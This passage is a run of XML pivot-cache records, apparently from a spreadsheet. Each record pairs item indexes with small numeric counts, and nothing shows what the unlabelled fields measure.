    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1146"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1146"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1147"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1147"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1147"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1147"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1147"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1147"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1147"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1147"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1147"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1147"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1147"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1147"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1147"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1147"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1148"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1148"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1148"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1148"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1148"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1148"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1148"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1148"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1148"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1148"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1148"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1148"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1148"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1148"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1149"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1149"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1149"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1149"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1149"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1149"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1149"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1149"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1149"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1149"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="20"/>
    <x v="1149"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1149"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1149"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1149"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1150"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1150"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1150"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1150"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="1150"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="9"/>
    <x v="1150"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="23"/>
    <x v="1150"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="123"/>
    <x v="1150"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1150"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1150"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="1150"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="7"/>
    <x v="1150"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1150"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="3"/>
    <x v="1150"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1151"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1151"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1151"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1151"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1151"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1151"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1151"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1151"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1151"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1151"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="1151"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="1151"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1151"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1151"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="1145"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1152"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1152"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1152"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1152"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1152"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1152"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1152"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1152"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1152"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1152"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1152"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1152"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1152"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1152"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1086"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1086"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1086"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1086"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1086"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="1086"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="7"/>
    <x v="1067"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="44"/>
    <x v="1067"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="18"/>
    <x v="1067"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1067"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1067"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1153"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1153"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1153"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1153"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1153"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1153"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1153"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1153"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1153"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="1153"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="1153"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="1153"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1153"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1153"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1154"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1154"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1154"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1154"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="1154"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="7"/>
    <x v="1154"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="40"/>
    <x v="1154"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="30"/>
    <x v="1154"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1154"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1154"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1154"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1154"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1154"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1154"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1154"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1155"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1155"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1155"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1155"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1155"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1155"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1155"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1155"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1155"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1155"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="1155"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1155"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="5"/>
    <x v="1155"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1155"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1156"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1156"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1156"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1156"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1156"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1156"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1156"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1156"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1156"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1156"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1156"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1156"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1156"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1156"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1156"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="7"/>
    <x v="1156"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="18"/>
    <x v="1156"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="46"/>
    <x v="1156"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1157"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1157"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1157"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1157"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1157"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1157"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1157"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1157"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1157"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1157"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="1157"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="1157"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1157"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1157"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1158"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1158"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1158"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1158"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="23"/>
    <x v="1158"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="10"/>
    <x v="1158"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="20"/>
    <x v="1158"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="20"/>
    <x v="1158"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1158"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1158"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1158"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1158"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1158"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1158"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1159"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1159"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1159"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1159"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1159"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="1159"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1159"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1159"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1159"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1159"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1159"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1159"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1159"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1159"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1160"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1160"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1160"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1160"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="12"/>
    <x v="1160"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="14"/>
    <x v="1160"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="14"/>
    <x v="1160"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1160"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1160"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="1160"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="33"/>
    <x v="1160"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="380"/>
    <x v="1160"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="5"/>
    <x v="1160"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1160"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1161"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1161"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1161"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1161"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="7"/>
    <x v="1161"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1161"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1161"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1161"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1161"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="5"/>
    <x v="1161"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="21"/>
    <x v="1161"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="20"/>
    <x v="1161"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1161"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1161"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1162"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1162"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1162"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1162"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1162"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1162"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="25"/>
    <x v="1162"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="22"/>
    <x v="1162"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1162"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1162"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="1162"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="32"/>
    <x v="1162"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1162"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1162"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1163"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1163"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1163"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1163"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1163"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1163"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1163"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="1163"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1163"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1163"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1163"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1163"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1163"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1163"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="1163"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1164"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1164"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1164"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1164"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1164"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1164"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1164"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1164"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1164"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1164"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="1164"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1164"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1164"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1164"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="5"/>
    <x v="1163"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1165"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1165"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1165"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1165"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="103"/>
    <x v="1165"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="20"/>
    <x v="1165"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="899"/>
    <x v="1165"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="471"/>
    <x v="1165"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1165"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1165"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1165"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1165"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1165"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1165"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="46"/>
    <x v="353"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="353"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1166"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1166"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1166"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1166"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="14"/>
    <x v="1166"/>
  </r>
  <r>
